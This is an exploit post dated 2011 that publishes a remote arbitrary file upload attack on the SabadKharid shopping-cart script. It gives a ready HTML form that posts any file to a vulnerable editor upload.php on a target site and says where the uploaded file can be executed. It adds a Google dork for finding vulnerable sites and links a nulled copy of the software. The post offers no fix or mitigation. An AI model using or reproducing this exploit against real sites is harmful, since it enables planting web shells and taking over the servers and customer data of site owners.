+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Author    : St493r
[#] Contact   : St493r@gmail.com
[#] Title     : SabadKharid Remote Arbitrary File Upload Exploit 
[#] Vendor    : http://sabadkharid.com
[#] Software  : http://dl.p30vel.ir/scripts/sabadkharid-professional-nulled-p30vel.zip
[#] Tested On : Linux
[#] Date      : 28 - 09 - 2011
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Vulnerability File : /wysiwyg/editor/filemanager/upload/php/upload.php
[#] Exploit            : Exploit.html

<strong>SabadKharid Remote Arbitrary File Upload Exploit</strong>
<form enctype="multipart/form-data" action="
http://TARGET/wysiwyg/editor/filemanager/upload/php/upload.php?Type=Media"
method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>

You can execute your uploaded file  from : http://TARGET/userfiles/yourfile

You can upload any file with any suffic

Google dork : Powered by Sabadkharid , inurl:"index.php?register"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Thanks To All Iranian Hackers
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++